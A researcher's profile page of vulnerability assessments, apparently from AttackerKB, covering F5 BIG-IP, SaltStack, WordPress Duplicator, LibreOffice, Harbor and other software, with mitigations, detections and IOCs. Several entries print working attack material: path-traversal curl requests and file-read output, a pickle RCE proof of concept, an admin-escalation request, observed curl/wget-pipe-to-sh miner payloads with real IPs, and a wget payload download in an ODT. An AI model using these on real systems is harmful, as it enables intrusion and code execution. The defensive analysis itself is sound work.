kevthehermit (108)

Last Login: September 24, 2020
Assessments
29
Score
108
6th Place

kevthehermit's Contributions (36)

Sort by:
Filter by:
4
Ratings
Technical Analysis

BIG-IP platforms with Cavium Nitrox SSL hardware acceleration cards, a virtual server configured with a Client SSL profile, and using Anonymous Diffie-Hellman (ADH) or Ephemeral Diffie-Hellman (DHE) key exchange and Single DH use option not enabled in the options list may be vulnerable to crafted SSL/Transport Layer Security (TLS) handshakes that may result with a pre-master secret (PMS) that starts in a 0 byte and may lead to a recovery of plaintext messages as BIG-IP TLS/SSL ADH/DHE sends different error messages acting as an oracle. Differences in processing time when the PMS starts with 0 byte coupled with very precise timing measurement observation may also expose this vulnerability.

Thats a lot to take in …
A recent research study identified a timing attack against TLS that could be used to recover a shared secret that could then be used to recover plaintext of previously captured data.

In order to be successful outside of a testing environment, an attacker would need to intercept encrypted traffic and then send specially crafted TLS packets to a vulnerable server in the hopes of recovering enough data to decrypt the previously intercepted traffic.

Conditions

This vulnerability affects BIG-IP systems with virtual servers associated with a Client SSL profile under the following conditions:

  • You are using ADH or DHE key exchange in the Client SSL profile.

    • Note: DHE is enabled by default in the DEFAULT cipher suite. ADH is not available in the DEFAULT cipher suite.
  • You have not enabled the Single Diffie-Hellman use option—or Single DH use option—in the Client SSL profile.

    • Note: The Single DH use option is not enabled by default in the Client SSL profile options list.
  • Your BIG-IP platform has a Cavium Nitrox SSL hardware acceleration card installed. Platforms with this installed include:

    • BIG-IP i11400-DS, i11600-DS, i11800-DS
    • BIG-IP 1600, 3600, 3900, 5000, 6900, 7000, 8900, 10000, 11000, 12000
    • VIPRION 2100, 2150, 2250, 4100, 4200, 4300

Mitigations

F5 have released a set of mitigations that will prevent this attack on vulnerable server until they can be patched.

  • Log in to the Configuration utility.
  • Go to Local Traffic > Profiles > SSL > Client.
  • Select the Client SSL profile.
  • In the Configuration list, select Advanced.
  • In the Options section, in the list, select Options List.
  • In the Options List section, under Available Options, select Single DH use, and then select Enable.
  • The Single DH Use option displays under Enabled Options.
  • In Ciphers, in the text box, enter a cipher string that disables ADH or DHE, such as the following example:
    !DHE:!ADH:ALL
  • In Unclean Shutdown, select Enabled.
  • At the bottom of the page, select Update.
3
Ratings
Technical Analysis

This is still a provisional assessment pending more research.

A high severity issue has been discovered in Citrix StoreFront that, if exploited, would allow an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.

This CVE is for Citrix StoreFront that allows an authenticated user to gain arbitrary file read on to the StoreFront server. This could lead to further compromise depending on the ability to exploit data recovered from the server.

The official statement from Citrix can be found here. https://support.citrix.com/article/CTX277455

Updates are availaible

  • Citrix StoreFront 1912 CU1 (1912.0.1000) and later versions of Citrix StoreFront 1912 LTSR
  • Citrix StoreFront 3.0 for 7.6 LTSR CU8 Hotfix (3.0.8001) and later versions of StoreFront 3.0 for 7.6 LTSR
  • Citrix StoreFront 3.12 for 7.15 LTSR CU5 Hotfix (3.12.5001) and later versions of StoreFront 3.12 for 7.15 LTSR

The advisory states that attackers must be authenticated in the same Microsoft Active Directory domain as the StoreFront server, if not this vulnerability is not exploitable.
This significantly impacts the ability for an attacker to exploit this vulnerability. An attacker would have to be:

  • An insider threat with technical knowledge
  • An attacker that already has authenticated access to the domain
6
Ratings
Technical Analysis

Overview

This one is Critical to patch quickly with a CVSS Score of 10.

If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.

Patch & Mitigation

Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.

Refer to the F5 Article for details. – https://support.f5.com/csp/article/K52145254

Cloud Services

If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.

  • At the time of Writing AWS MarketPlace version is 15.1.0.2-0.0.9

In the wild POC

Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.

Core Vulnerability.

The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.

Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:

  • File read
  • File Write
  • tmsh access
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}%           

This doesn’t only affect the login.jsp path it can be used from anywhere.

curl --insecure  'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
2
Ratings
Technical Analysis

Outline

Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.
  • A valid authenticated account with permissions to access /tickets

Patch

This doesn’t not appear to be patched in the latest release, although it has been acknowledged

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

tldr

The use of unserialize in PHP that accepts user data. There is no sequence of code that can be exploited to gain code execution using this method.

Outline

Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.

If the base PHP version that is running this application also happens to be a version of PHP vulnerable to https://www.cvedetails.com/cve/CVE-2017-5340/ Then there is an increased possibility of gaining code execution using this methodology.

Patch

At the time of release, there is no official patch although third party patches have been made available here

2
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

tldr

The use of unserialize in PHP that accepts user data. There is no sequence of code that can be exploited to gain code execution using this method.

Outline

Passing user-controlled data to unserialize in PHP is always a bad idea. However, in order to be exploitable there needs to be additional code that will process the data through the use of Magic Methods. There do not appear to be any dangerous methods that take this data in the current version of the PHP script.

If the base PHP version that is running this application also happens to be a version of PHP vulnerable to https://www.cvedetails.com/cve/CVE-2017-5340/ Then there is an increased possibility of gaining code execution using this methodology.

Patch

At the time of release, there is no official patch although third party patches have been made available here

4
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This one has a name and a website. – https://callstranger.com/

There is also a github repository that has PoC code, this code will scan your local IP range to determine if you have vulnerable devices. Be aware this POC will send data about your network out to a 3rd party. It claims to encrypt this data, but I have not reviewed the implementation.
It may not have a list of internal UPNP Devices, but it will have a record of your IP, how much data was sent.

https://github.com/yunuscadirci/CallStranger

Root Cause

A Callback header that can be controlled by the attacker in the UPnP SUBSCRIBE functionality can lead to SSRF-Like behaviour

Threat

DDOS:

This seems to be the obvious one that will get picked up by most botnet operators at some point.

DLP

Don’t expect this to be a likely threat, there are easier ways to bypass outgoing DLP restrictions than this.

SSRF Like

Needs more review but Scanning internal ports from Internet-facing UPnP devices could be useful, depending on what data is returned.

4

As Public PoCs are now out. I am sharing mine here. as well.

https://github.com/kevthehermit/CVE-2020-11651

2

Active exploits in the wild have now been observed.

https://twitter.com/KevTheHermit/status/1256873327991443456

Payload is a CryptoMiner.

Base Command "(curl -s 217.12.210.192/sa.sh||wget -q -O- 217.12.210.192/sa.sh)|sh"
Miner Download – https://bitbucket.org/samk12dd/git/src/master/salt-store

10
Ratings
Technical Analysis

Overview

For Salt Master before 2019.2.4 and 3000 before 3000.2 there is potential for RCE as root.

If a salt-master has its ZeroMQ ports 4506 exposed to the public it is possible for an unauthenticated user to gain access to the root_key. With access to the root key it is possible to run a wide range of salt commands that include file read, file write and command execution. These commands can be executed on the salt-master and any minion that is connected.

This requires multiple socket requests. one to read the key and then additional requests to create jobs.

Proof Of Concept

This POC was tested on SaltStack 2019.2.0

As of the time of writing this assessment I have been able to create a functional exploit POC. The Code can be found here – https://github.com/kevthehermit/CVE-2020-11651

The POC and others I am sure will appear shortly has the following functionality

  • Read the root key
  • Read and Write files on the Salt Master
  • Construct a payload to gain full RCE as root on any connected Minion

This took several hours and is “easy” with the available information and access to a test instance. Details on the discovery process can be found on our blog – https://immersivelabs.com/2020/05/06/hackers-are-currently-attacking-vulnerable-saltstack-systems/

Mitigations:

Patch to the latest versions and do not expose theses ports to the external network.

Detections

examine /var/cache/salt/master/jobs/ on the salt master for a listing of all jobs. the return.p file in these dirs will contain a detailed description of the request and the response. This data is serialised.

Immersive Labs have released a basic python script to parse all these job files – https://immersivelabs.com/2020/05/06/how-to-lock-onto-the-hackers-targeting-saltstack-minions/

# cat /var/cache/salt/master/jobs/65/6e5fa0837ca5f3d391c4d70d345ee25baed089b970a78a934709e80d083f95/7a5388b6a882_master/return.p
��return��fun�wheel.file_roots.read�jid�20200501195107225222�user�UNKNOWN�fun_args��../../../../etc/shadow��saltenv�base�_stamp�2020-05-01T19:51:07.229260�return��� /srv/salt/../../../../etc/shadow��root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
postgres:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
salt:!:18164:0:99999:7:::

Snort Rule:

alert tcp $EXTERNAL_NET any -> $HOME_NET 4506 (msg:"Salt Stack root_key read attempt"; content:"_prep_auth_info"; sid:1000000; rev:1;)

On the wire it looks a bit like this so a stronger rule can be created
b'\x82\xa3enc\xa5clear\xa4load\x81\xa3cmd\xaf_prep_auth_info'

In the wild

The following IPS have been observed sending malicious payloads. other IPS have been seen scanning.

  • 95.181.178.108
  • 89.151.132.112
  • 89.27.255.58
  • 104.244.76.189
  • 95.213.139.92
  • 81.92.218.74
  • 178.44.87.133

Payloads

The following Payloads have been observed

  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
  • import subprocess;subprocess.call(\"(curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh\",shell=True)
  • /bin/sh -c '(wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://94.253.90.22:44444/ || curl -fs --connect-timeout 5 -m10 --retry 3 http://94.253.90.22:44444/)|sh -s -- 94.253.90.22:44445 G9/kjA/vdOSlUG3q+lz6DZwzr0rgiNWRfbb2UZcnYgmUY01gHW5tQrS6SgjiN/6doZfjvmc='
  • (curl -s anagima3.top/sa.sh||wget -q -O- anagima3.top/sa.sh)|sh
  • (curl -s 95.142.44.216/sa.sh||wget -q -O- 95.142.44.216/sa.sh)|sh
  • (curl -s 176.104.3.35/?6920||wget -q -O- 176.104.3.35/?6920)|sh
  • /bin/sh -c 'wget -qO- -t3 -w1 -T10 --no-http-keep-alive http://217.25.227.174:44444/?i=[redacted_ip]
1
Ratings
Technical Analysis

There are a lot of moving parts to be able to exploit this. But if successful will give an attacker a container escape on to the kube host.
An attacker must already have shell access to a container and there must be a process running from the host that uses the kubectl cp command.
This is occasionally seen used to copy files like log files out of a container to the host for backup or additional processing.

If a user can replace the tar binary in the container it is possible to perform actions like editing the .bashrc file on the host. This could be used to create new SSH accounts, or establish a reverse shell as that user. Typically with root permissions.

1
Ratings
Technical Analysis

There are three specific requirements for an application to be vulnerable:

  • Vulnerable version !
  • Using a Database for storage
  • Self Registration enabled.

Self-registration is not a very common setting but it has been seen.

If you are able to register your own account it is trivial to modify a POST request and elevate yourself to admin permissions.

POST /api/users HTTP/1.1
Host: 10.102.7.190
Content-Type: application/json
Content-Length: 95
Connection: close


{"username":"Tom","email":"Tom@demo.local","realname":"Tom","password":"Password1","comment":null, "has_admin_role":"true"}

If you have access to the repository as an admin you can manipulate the containers and even gain further access in to the network if you can read and or modify any of the cotanienrs or their secrets.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

rConfig reports almost 3.5 million devices managed by this utility. A search of Shodan reveals there are several dozen instances exposed directly to the internet on a vulnerable version.

This exploit allows RCE on the host. If you can gain host access you can read the database keys in ./config/config.inc.php and then access the database.

By design the database contains the details for all of your network devices. It also contains clear text credentials for access to these devices.

MariaDB [rconfig]> select deviceUsername, deviceName, devicePassword, deviceEnablePassword, deviceIpAddr from nodes;

+----------------+------------+----------------+----------------------+--------------+

| deviceUsername | deviceName | devicePassword | deviceEnablePassword | deviceIpAddr |

+----------------+------------+----------------+----------------------+--------------+

| admin          | Primary    | password       | password             | 10.10.10.10  |

+----------------+------------+----------------+----------------------+--------------+

1 row in set (0.00 sec)



MariaDB [rconfig]> 

This then permits any attacker to gain access to a wide range of internal network devices.
As rConfig is typically seen to access these devices it is easy for an attacker to hide amongst the background noise.

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Low
Technical Analysis

SQLAlchemy is one of the most popular ORMs for Python / SQL Database interaction. It is heavily used in python web applications with frameworks like Flask and Django.

ORMS are heavily used as they prevent the need for raw queries, which also adds input sanitization as part of its process.

This specific exploit would allow SQL Injection if an attacker can control the input sent to group_by as this field was not being filtered. This could resutl in full DB compromise including the compromise of credentials.

Whilst the use of SQLAlchemy is fairly common the specific requirements around the version and the group_by parameter being accessible to an end-user may not be as common.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Medium
Technical Analysis

This forms the basis of a social engineering attack, It requires libre office and python installed. This means it is a limited pool of targe victims. However this is a common setup on Linux desktop environments which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an odt file can be seen below

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh&#x201D;)"/>
    <LineBreak nWidth="1458" Line="./payload.sh&#x201D;)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>
3

I had not seen any POC code listed for this but it is incredibly simple to exploit based on the published details.

In [15]: import requests

In [16]: base_url = "http://172.17.0.2"

In [17]: params = {"action": "duplicator_download", "file": "/../../../../etc/passwd"}

In [18]: requests.get(base_url, params=params).text
Out[18]: 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/bin/false\nmysql:x:101:101:MySQL Server,,,:/var/lib/mysql/:/bin/false\n'

In [19]: 

File read is still only in the context of the web server so its typically not going to be root.

1

Thank you, I agree that over time I would not expect to continuously adjust the scores and I completely agree with your statements, I just think that it would be useful for others who may not know to include that kind of detail in the initial analysis.

1

Thanks,

Can you add any more context to this report, that would help people understand the risks wIth this exploit?
As it is from 2010 I would not expect it to to have significant attacker value or be common in enterprise environments any more.

1

In your analysis you stated that this is common in enterprise. Is this still the case, whilst i can accept that there will be some organisations that are running legacy I feel that this will not longer be common, and therefore its attacker value is decreased?

Or do we think that it is still a very large threat surface for enterprise?

4
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Technical Analysis

This plugin is recorded as having over 1 Million installations via Wordpress – https://wordpress.org/plugins/duplicator/
It has a free and a pro version with both being impacted.

Other reporting suggests that there are around 170,000 active installations. with ~ 150,000 of these not on the latest version.

The vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack can lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.

This exploit has been seen in active campaigns as reported by wordfence – https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/

IOC’s Shared by wordpress and replicated here for ease of discovery.

Indicators Of Compromise (IOCs)
The following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.

Traffic logged from the threat actor’s IP address should be considered suspicious:

  • 77.71.115.52
    • Attacks in this campaign are issued via GET requests with the following query strings:
  • action=duplicator_download
    • file=/../wp-config.php
    • Note: Because this vulnerability can be exploited via WP AJAX, it’s possible to exploit via POST request. In this case, it’s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.
3
Ratings
Technical Analysis

This was my first CVE :)

This is an Unauthenticated Arbitrary File Read vulnerability in all versions of The Open Source Social Network prior to 5.3 This includes the Open source and commercial versions.

Attacker value stays low as there is not a large population using this application ~ 500,000 downloads and the first phase of the attack can take several hours.

Phase 1 You need the Site Key. The site key is cryptographically weak and If you can get any cipher text you can recover the key in less than 14 hours on a standard laptop.
If you are unable to gain access as a standard user you can get crypto material from other locations but the PoC is designed for the user strings.

Once the Site Key has been recovered you can use the python script to read any file (in the context of the application) from disk. This includes database credentials and site configurations that can allow for admin access to the site. From here you can gain a full shell using a PHP plugin upload.

Full details can be found – https://techanarchy.net/pages/blog/cve-2020-10560-ossn-arbitrary-file-read

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

This plugin is currently listed as having over 5000 active installations and a little over 3 hundred thousand downloads.

The ability to add an XSS payload is only available when creating or updating calendars which is an admin level feature, this means it is unlikely to be valuable to an attacker as if they already have this level of access there are more damaging attacks that can be performed.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

This affects products that are designed for Small – Medium enterprise more than home users so it is likely to have a higher value to an attacker.
As some of these devices like firewalls are designed to operate at the network perimeter It is fairly simple to identify vulnerable products.

The exploit is an unauthenticated remote code execution attack that leads to full root-level access on the affected device. This level of access can be used to pivot into the internal network or in the case of Firewall products it could be used to alter or intercept traffic from inside the organisation.

Exploit code has been seen for sale and not publicly released, however, the patches are now available to it is possible to reverse engineer the location of the exploit using information from the advisory and access to the firmware.

Additionally, ZyXel has devices that are no longer supported and will not receive a patch. Full details of affected products and patches can be found on their website.

https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml

Details on the reporting and identification can be found – https://krebsonsecurity.com/tag/cve-2020-9054/

1
Ratings
Technical Analysis

VPN clients are commonly found on laptops for remote office workers, This is a local priv esc on all Aviatrix VPN Clients. As it is local it would need either a malicious user or an attacker with User level access looking to escalate.

When the VPN client starts it creates a locally running Web service. This service is capable of running commands in the context of the service, which runs as Root / Admin level permissions.

The service uses a set of certificates to authenticate the web service, however these certificates are included in a compiled python executable, it is it trivial to recover these certificated and therefore execute commands to gain elevated privileges.

https://immersivelabs.com/2019/12/04/aviatrix-vpn-client-vulnerability/

1
Ratings
Technical Analysis

VPN clients are commonly found on laptops for remote office workers, This is a local priv esc on all Aviatrix VPN Clients. As it is local it would need either a malicious user or an attacker with User level access looking to escalate.

Due to file permissions on scripts that are executed to start and stop the VPN client, it is trivial to inject arbitrary OS commands that can be used to escalate privs.

https://immersivelabs.com/2019/12/04/aviatrix-vpn-client-vulnerability/

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very Low
Technical Analysis

This is an RCE in the Chrome Javascript engine. There are Proof of Concepts that target both Linux and Windows environments.

The existing POCs are not chained with a Sandbox escape which makes successful exploitation just using the existing code impractical.

The Current CVE lists any version of Chrome below 80.0.3987.122 as vulnerable during testing the existing POC would not exploit on versions below 80. This is likely to do with the way the exploit is constructed to target the specific test environment rather than older versions not being vulnerable.

From an attacker perspective, if this exploit could be chained with a sandbox escape it could be very valuable for Watering Hole attacks.

Google Chromes automated update system should protect most users, however, Organisations with version pinned installations may be at a higher risk.

Resources:

Edited: To correct upper version number

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Low
Technical Analysis

Centreon is an Open Source Centralised IT management solution. When installed in a corporate network it is used to query all other devices. This makes it a high value target for attackers for several reasons:

  • Source of all networked devices and configuration.
  • Could be used to pivot across the network.
  • Use as a staging /beachhead host this is expected to talk to other devices on the network.

There is no indication of an active userbase from the Products website. the official Github repository as no more than a few hundred stars and forks.
A quick shodan search reveals around 40 internet facing applications.

This vulnerability appears to be post exploitation so an attacker would require either valid credentials or the ability to launch a password attack against the target.

The publicly listed blog post https://code610.blogspot.com/2020/02/postauth-rce-in-centreon-1910.html includes steps to reproduce but doesn’t provide a PoC script. That being said it would be trivial with a few lines of python to create a simple PoC Script.
The only tested version was 19.10,

At the time of writing there does not appear to be any official patch and the website is still serving vulnerable versions. Whilst a full review has not been completed a check of the github repo suggests that all versions are potentially vulnerable

8

I am still reviewing this in my lab environment, however you marked this as difficult to patch. From the zdi writeup I assume just changing the keys is enough to mitigate

1
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

This is related to https://attackerkb.com/topics/cve-2020-8819 It is the same plugin for a different platform and is vulnerable to the same

Magento does not provide an indication of how many websites have the plugins installed, but using the WooCommerce as a guide it is expected to be relatively low ~ 500 installs.

POC code is available in the github repo as part of the disclosure and is replicated at the end of this analysis for convenience.

At the time of this analysis, the Magento MarketPlace was still serving a vulnerable version. 2.0.30 – https://marketplace.magento.com/cardgate-magento2.html

<?php
/*
  Usage:

  1. Change values of the constants (see below for TARGET & ORDER*)
  2. Host this script somewhere (must be public accessible)
  3. Register a merchant at https://cardgate.com
  4. Sign into "My CardGate" dashboard
  5. Add fake site or choose existing one
  6. Click "Setup your Webshop" button in site preferences
  7. Paste the URL of this script into the pop-up window and click "Save"
  8. The target store now uses the settings of your site, enjoy :]

  P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
